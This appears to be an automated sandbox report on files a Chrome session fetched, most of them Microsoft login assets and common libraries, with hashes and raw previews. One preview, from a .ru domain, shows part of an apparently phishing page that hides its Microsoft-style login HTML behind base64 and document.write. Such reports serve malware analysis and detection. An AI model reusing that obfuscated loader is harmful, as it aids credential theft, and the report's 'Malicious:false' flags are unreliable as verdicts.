                                                                                      Preview:L..................F.@.. ...$+.,......1{Lb..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z]!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 03:10:56 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2679
                                                                                      Entropy (8bit):4.004930314811655
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8yd2TyuOHqidAKZdA1duTeehOuTbbiZUk5OjqehOuTbVfy+yT+:8rngTfTbxWOvTbVfy7T
                                                                                      MD5:88EB05D888017E47375105CC6F3FCF7C
                                                                                      SHA1:E96E40F61050236FAE9D10C908CA60B1E83BC189
                                                                                      SHA-256:9FD220B4E5D0F0DB7B7E50DCC80BA628FE7A998F1E7663FE4EC4A2D99B6F2853
                                                                                      SHA-512:E30D0536CD339B746FCB7703C3B6B54184C487A72EE9C4682FE0BA0A516A94A4E30F58752C01CDC6266D9477DD1DD5871E4C51019A0396693A8C115D4520AA23
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,.....j.{Lb..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z]!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):3452
                                                                                      Entropy (8bit):5.117912766689607
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://login.live.com/Me.htm?v=3
                                                                                      Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                      Category:dropped
                                                                                      Size (bytes):61052
                                                                                      Entropy (8bit):7.996159932827634
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                      MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                      SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                      SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                      SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                      Category:downloaded
                                                                                      Size (bytes):1435
                                                                                      Entropy (8bit):7.8613342322590265
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                      Category:downloaded
                                                                                      Size (bytes):17174
                                                                                      Entropy (8bit):2.9129715116732746
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://acctcdn.msauth.net/images/favicon.ico?v=2
                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 379
                                                                                      Category:dropped
                                                                                      Size (bytes):254
                                                                                      Entropy (8bit):7.066074991728423
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:XtS8G99k8e6my4IIFqXUJ59lDFCnhUGlZX8My/dOtrE:XAH99kRX1YQBDFCnDXdWYtrE
                                                                                      MD5:847A4212B99B9076EE39328B24CD30AF
                                                                                      SHA1:73F15078CF1D396485F644A79B6E25EF0637685D
                                                                                      SHA-256:29DC0C26C372805325EB7EB926769E832A60B47BEF96A66436EC3EC05CD6128E
                                                                                      SHA-512:9AF77E9ED8BD9A39A47F36AAC2D01B5AF5D56C04CD933427DF95CC80904D7EE7AC3F7F9443D8AEF236CC84FB4DC4CC335AF0BF8F9BC0C13D720187096D149220
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..........mP.n. ...D.xY0.\..{. 7...y.F!.....T..Y.Y..n...q^.[O}..w.SJ.j..3.....%)....x.f.K}..}\.=E.D....!.n.......Ma..G.=+.%.w..WX...9.A...........X...V...bOB&2.H....15{.fT...V-.#..m..f...V2<...~....l%4.....Ie.TL69.....vW.....v.3.v.O..}..{...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65402)
                                                                                      Category:downloaded
                                                                                      Size (bytes):155267
                                                                                      Entropy (8bit):5.668726641551108
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:uGXQR31Vi2YhA+JQmO4qRumgyZ7UK1T6hTTv3/Mdupyrp:uGXQpi2Yu+JjOJZ771TqPvPMdupk
                                                                                      MD5:92A5127D0FD351E97A664D8E3D714C3A
                                                                                      SHA1:7D89CF8E17368D3998EF71C8332DF3DF409C5125
                                                                                      SHA-256:A22A499EB2C010394F6889D9454024070131246409CA115FC91B73835FCE9D01
                                                                                      SHA-512:E390A9C8BA97C40315B179C2ACECC1EF0B439AE75BCA1A215307CB39A1E52A86DD9E3251879A51AE07AAEF80087996835F0A2595C2E690DD273D398A70BFC40C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://client.hsprotect.net/PXzC5j78di/main.min.js
                                                                                      Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                      Category:dropped
                                                                                      Size (bytes):1435
                                                                                      Entropy (8bit):7.8613342322590265
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):48316
                                                                                      Entropy (8bit):5.6346993394709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                      Category:downloaded
                                                                                      Size (bytes):116343
                                                                                      Entropy (8bit):7.997640489040715
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                      MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                      SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                      SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                      SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                                      Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                      Category:dropped
                                                                                      Size (bytes):89501
                                                                                      Entropy (8bit):5.289893677458563
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (13737), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):32570
                                                                                      Entropy (8bit):5.887689974990136
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:JQPNVTge3UNFt2fQPNVTge3UNFtylrJlrM:8Tge3UT/Tge3UTsTO
                                                                                      MD5:9E423BBF97F2CCF88913521BAFF57E02
                                                                                      SHA1:DDA11CC73F21B947B7DE1343CDE8272A62F0DF3C
                                                                                      SHA-256:58CD00A8D244DE14C314EE387DFC9CD813CF8CC827EB57FFAAC59AEFA0015414
                                                                                      SHA-512:8EF0F74D41C1448901F919B3BE021FA6EBFCC1E73E7238ACAF66EB47EDF22AD761709BD8EDDDFF2F69FEEBF10321FD4800B4C2F2FB1E6DF712771A1730980FC5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://lap.gnoqwwhpwe.ru/3aeK/
                                                                                      Preview: Success usually comes to those who are too busy to be looking for it. -->....<script>../* All our dreams can come true if we have the courage to pursue them. */..if(atob("aHR0cHM6Ly82U0tULmdub3F3d2hwd2UucnUvM2FlSy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdG
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):3452
                                                                                      Entropy (8bit):5.117912766689607
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://login.live.com/Me.htm?v=3
                                                                                      Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):72
                                                                                      Entropy (8bit):4.241202481433726
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
